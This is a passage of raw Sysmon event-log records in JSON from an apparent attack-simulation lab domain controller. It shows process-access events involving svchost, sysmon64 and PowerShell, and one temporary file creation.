029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.409\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.409","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.424\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.424","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.440\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_l4xcpdlk.un3.ps1\r\nCreationUtcTime: 2020-08-01 07:59:19.440","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 